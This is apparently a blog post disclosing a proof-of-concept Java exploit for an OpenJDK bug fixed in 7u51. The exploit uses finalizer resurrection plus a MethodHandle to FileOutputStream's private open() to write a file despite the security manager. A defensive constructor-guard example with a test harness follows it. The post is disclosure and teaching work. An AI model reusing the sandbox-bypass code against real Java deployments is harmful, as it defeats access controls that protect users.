I tweeted a while ago about an OpenJDK vulnerability that was reported on one of the mailing lists. Now that it has been fixed in 7u51, here is a simple PoC exploit:
import java.lang.invoke.*;

class test extends java.io.FileOutputStream {
    static test t;

    test() throws Exception {
        // FileOutputStream("") fails in the constructor, but the object has
        // already been allocated, so finalize() still runs on it later.
        super("");
    }

    protected void finalize() {
        // Finalizer attack: resurrect the partially constructed instance.
        t = this;
    }

    public static void main(String[] args) throws Throwable {
        // A method handle for FileOutputStream's private open(String, boolean),
        // the low-level call the public constructor guards with a SecurityManager check.
        MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
                MethodType.methodType(void.class, String.class, boolean.class));
        System.out.println(mh);
        try { new test(); } catch (Exception ignored) { }
        System.gc();
        System.runFinalization();
        // Open the file through the resurrected instance, bypassing the constructor's check.
        mh.invokeExact(t, "oops.txt", false);
    }
}
Run this with a security manager enabled on a version earlier than 7u51 and it'll create the file oops.txt, even though the code doesn't have the rights to do so.
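As an added example (not from the original post, and not OpenJDK's own fix), here is the constructor pattern that keeps a finalizer-resurrected, partially constructed instance from being useful through the class's public API: the check runs before any instance state exists, and methods refuse to work unless the constructor actually finished. The class and method names are assumptions for illustration.

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

// Hypothetical writer class whose constructor enforces a check (here a simple
// name policy standing in for a SecurityManager check).
class GuardedWriter {
    private final Path target;
    private final boolean initialized;   // stays false if the check threw

    public GuardedWriter(String name) {
        // checkAccess() runs before the private constructor body, so a thrown
        // exception leaves the allocated object with initialized == false.
        this(checkAccess(name), name);
    }

    private static boolean checkAccess(String name) {
        if (name == null || name.isEmpty() || name.contains("..")) {
            throw new SecurityException("write to '" + name + "' denied");
        }
        return true;
    }

    private GuardedWriter(boolean checked, String name) {
        this.target = Paths.get(name);
        this.initialized = checked;
    }

    public void write(byte[] data) throws java.io.IOException {
        if (!initialized) {
            throw new IllegalStateException("constructor never completed");
        }
        Files.write(target, data);
    }

    // Harness: the same finalize() trick as the PoC, now against GuardedWriter.
    static class Resurrect extends GuardedWriter {
        static Resurrect leaked;
        Resurrect() { super(""); }                    // check throws, object still allocated
        @Override protected void finalize() { leaked = this; }
    }

    public static void main(String[] args) throws Exception {
        try { new Resurrect(); } catch (SecurityException e) { /* expected */ }
        System.gc();
        System.runFinalization();
        if (Resurrect.leaked == null) { System.out.println("not resurrected this run"); return; }
        try { Resurrect.leaked.write("x".getBytes()); }
        catch (IllegalStateException e) { System.out.println("blocked: " + e.getMessage()); }
    }
}
```

Whether finalize() runs on a given invocation depends on the collector, so the harness reports when no resurrection happened; when it does, write() is refused. This guards the public entry points only and does not address access-check bugs in MethodHandle lookup itself.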